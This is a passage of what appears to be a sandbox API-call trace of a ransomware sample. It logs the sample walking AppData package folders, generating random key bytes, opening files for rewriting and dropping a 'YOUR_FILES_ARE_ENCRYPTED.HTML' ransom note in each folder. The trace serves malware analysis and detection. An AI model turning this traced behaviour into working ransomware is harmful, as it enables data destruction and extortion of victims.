pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat") returned 111 [0114.472] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.472] lstrlenW (lpString=".dat") returned 4 [0114.472] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.472] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0114.472] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0114.472] GetProcessHeap () returned 0x600000 [0114.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0114.474] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="74") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="92") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="4E") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="3D") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="3D") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="11") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="E6") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B2") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="65") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C9") returned 2 [0114.474] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="4E") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="98") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CF") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="5C") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="8D") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="8F") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="30") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B6") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="8C") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1A") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="5F") returned 2 [0114.475] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="1B") returned 2 [0114.475] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="BB") returned 2 [0114.475] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="35") returned 2 [0114.475] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3A") returned 2 [0114.475] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="6B") returned 2 [0114.475] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="AA") returned 2 [0114.475] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="77") returned 2 [0114.475] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F2") returned 2 [0114.475] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="61") returned 2 [0114.475] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="18") returned 2 [0114.475] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="21") returned 2 [0114.475] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat" [0114.475] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.476] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0114.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9035563d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9035563d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9035563d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0114.476] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.476] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 116 [0114.476] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0114.476] lstrlenW (lpString=".LOG1") returned 5 [0114.476] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0114.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9037b75e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9037b75e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9037b75e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0114.476] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.476] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 116 [0114.476] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0114.476] lstrlenW (lpString=".LOG2") returned 5 [0114.476] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0114.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9037b75e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9037b75e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9037b75e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0114.476] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.476] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0114.476] GetProcessHeap () returned 0x600000 [0114.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.477] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.501] CloseHandle (hObject=0x324) returned 1 [0114.501] GetProcessHeap () returned 0x600000 [0114.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.501] GetProcessHeap () returned 0x600000 [0114.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.501] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0114.501] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.501] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData") returned 103 [0114.502] GetProcessHeap () returned 0x600000 [0114.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.502] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData" [0114.502] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData\\*" [0114.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.503] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.503] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.503] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0114.503] GetProcessHeap () returned 0x600000 [0114.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.504] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.505] CloseHandle (hObject=0x324) returned 1 [0114.505] GetProcessHeap () returned 0x600000 [0114.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.505] GetProcessHeap () returned 0x600000 [0114.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.505] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0114.505] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.505] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState") returned 99 [0114.505] GetProcessHeap () returned 0x600000 [0114.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.506] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState" [0114.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState\\*" [0114.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.507] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.507] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.507] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.507] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0114.507] GetProcessHeap () returned 0x600000 [0114.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.508] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.641] CloseHandle (hObject=0x324) returned 1 [0114.641] GetProcessHeap () returned 0x600000 [0114.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.641] GetProcessHeap () returned 0x600000 [0114.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0114.642] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.643] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0114.643] GetProcessHeap () returned 0x600000 [0114.643] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.644] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.646] CloseHandle (hObject=0x320) returned 1 [0114.646] GetProcessHeap () returned 0x600000 [0114.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.646] GetProcessHeap () returned 0x600000 [0114.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.648] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.AccountsControl_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ACC")) returned 1 [0114.648] StrStrIW (lpFirst="Microsoft.AccountsControl_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.648] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy") returned 88 [0114.648] GetProcessHeap () returned 0x600000 [0114.648] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.649] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy" [0114.649] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\*" [0114.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.656] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.656] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", 